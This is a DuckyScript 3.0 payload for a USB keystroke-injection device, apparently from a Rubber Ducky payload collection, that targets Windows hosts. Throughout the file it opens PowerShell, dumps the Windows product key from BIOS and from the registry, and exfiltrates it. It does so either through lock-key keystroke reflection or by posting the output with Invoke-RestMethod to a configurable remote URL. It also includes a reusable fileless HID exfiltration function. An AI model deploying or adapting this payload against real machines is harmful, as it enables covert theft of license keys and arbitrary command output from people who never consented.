REM       WindowsLicenseKeyExfiltration
REM       Version 1.0
REM       OS: Windows
REM       Author: 0i41E
REM       Requirement: DuckyScript 3.0
REM       This small powershell payload dumps the Windows license key, which can be either saved within the Bios and/or in the registry.

REM Extension made by Korben for checking if Target is Windows OS
EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT
    REM VERSION 1.1
    REM AUTHOR: Korben

    REM_BLOCK DOCUMENTATION
        Windows fully passive OS Detection and passive Detect Ready
        Includes its own passive detect ready.
        Does not require additional extensions.

        USAGE:
            Extension runs inline (here)
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
            boot delay
            $_OS will be set to WINDOWS or NOT_WINDOWS
            See end of payload for usage within payload
    END_REM

    REM CONFIGURATION:
    DEFINE #MAX_WAIT 150
    DEFINE #CHECK_INTERVAL 20
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
    DEFINE #NOT_WINDOWS 7

    $_OS = #NOT_WINDOWS

    VAR $MAX_TRIES = #MAX_WAIT
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
        DELAY #CHECK_INTERVAL
        $MAX_TRIES = ($MAX_TRIES - 1)
    END_WHILE
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
        $_OS = WINDOWS
    END_IF

    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
        IF ($_OS == WINDOWS) THEN
            STRING HELLO WINDOWS!
        ELSE
            STRING HELLO WORLD!
        END_IF
    END_REM
END_EXTENSION

REM Extension made by 0i41E to signalize the payloads end
EXTENSION DETECT_FINISHED
    REM VERSION 1.0
    REM AUTHOR: 0i41E

    REM_BLOCK DOCUMENTATION
        USAGE:
            Use the function Detect_Finished() to signal the finished execution of your payload.
    END_REM

    REM CONFIGURATION:
    DEFINE #PAUSE 150
    FUNCTION Detect_Finished()
        IF ($_CAPSLOCK_ON == FALSE)
            CAPSLOCK
            DELAY #PAUSE
            CAPSLOCK
            DELAY #PAUSE
            CAPSLOCK
            DELAY #PAUSE
            CAPSLOCK
            ATTACKMODE OFF
        ELSE IF
            CAPSLOCK
            DELAY #PAUSE
            CAPSLOCK
            DELAY #PAUSE
            CAPSLOCK
            ATTACKMODE OFF
        END_IF
    END_FUNCTION
END_EXTENSION

REM Extension made by 0i41E for fileless exfiltration via Lock Keys
EXTENSION WINDOWS_FILELESS_HID_EXFIL
    REM VERSION 1.0
    REM AUTHOR: 0i41E

    REM_BLOCK DOCUMENTATION
        Extension for Keystroke Reflection data exfiltration without putting files on disk.
        This extension is a proof of concept for USB HID only Data Exfiltration and is based on Hak5s original Method.

        TARGET:
            Windows Hosts that supports powershell and SendKeys

        USAGE:
            Type out your command or script with powershell, don't execute it yet (so just type it out with STRING), afterwards you put the function Windows_Fileless_HID_Exfil() behind it.
            It'll take the commands/scritps output and writes it into a variable, which then gets exfiltrated.

        Example Usage:
            GUI r
            DELAY 500
            STRINGLN powershell
            DELAY 1000
            STRING echo "This is my test"
            Windows_Fileless_HID_Exfil()
    END_REM

    FUNCTION Windows_Fileless_HID_Exfil()
        DELAY 250
        REM Saving current Keyboard lock keys
        SAVE_HOST_KEYBOARD_LOCK_STATE
        $_EXFIL_MODE_ENABLED = TRUE
        $_EXFIL_LEDS_ENABLED = TRUE
        DELAY 500
        REM Setting the output as variable
        STRING |Out-String|Set-Variable -Name "DD";
        REM Converting output into Lock Key values
        STRING $BL = $DD.ToCharArray();$c = "";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';
        REM Exfiltrating via Keystroke Reflection
        STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit
        REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.
        WAIT_FOR_SCROLL_CHANGE
        LED_G
        $_EXFIL_MODE_ENABLED = FALSE
        RESTORE_HOST_KEYBOARD_LOCK_STATE
    END_FUNCTION
END_EXTENSION

REM If set to TRUE, keys will be send via PowerShells Invoke-Restmethod
DEFINE #REMOTE_EXFIL FALSE
REM Define the remote host to which the keys shall be send to. (Only when REMOTE_EXFIL is set to TRUE!)
DEFINE #URL https://example.com/

REM If Target is Windows, execute payload
IF ($_OS == WINDOWS) THEN
    GUI r
    DELAY 500
    STRINGLN powershell -nop -noni
    DELAY 1000
    STRINGLN Write-Host "[+]Attempting exfiltration of Windows Product Keys..." -ForegroundColor Green
    DELAY 300
REM Dumping License key when saved in Bios
    STRING $Get_License = "echo 'Product Key in Bios:';(Get-WmiObject -query 'select * from SoftwareLicensingService').OA3xOriginalProductKey;
REM Dumping License key via registry
    STRING Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -name BackupProductKeyDefault | Select-Object BackupProductKeyDefault"
REM Executing Get_License
    STRING ;IeX $Get_License

REM If REMOTE_EXFIL is set to TRUE,exfiltrate keys to remote host
    IF_DEFINED_TRUE #REMOTE_EXFIL
            DELAY 500
REM Setting the output as variable & sending it to defined remote host
            STRINGLN |Out-String|Set-Variable -Name "DD";Invoke-Restmethod -UseBasicParsing -Method Post -Uri "#URL" -Body $DD;exit
            DELAY 150
            Detect_Finished()
    ELSE_DEFINED
REM Exfiltrating License key via Keystroke Reflection
            Windows_Fileless_HID_Exfil()
            DELAY 150
            Detect_Finished()
    END_IF_DEFINED
REM If System is not Windows...
ELSE
    ATTACKMODE STORAGE
END_IF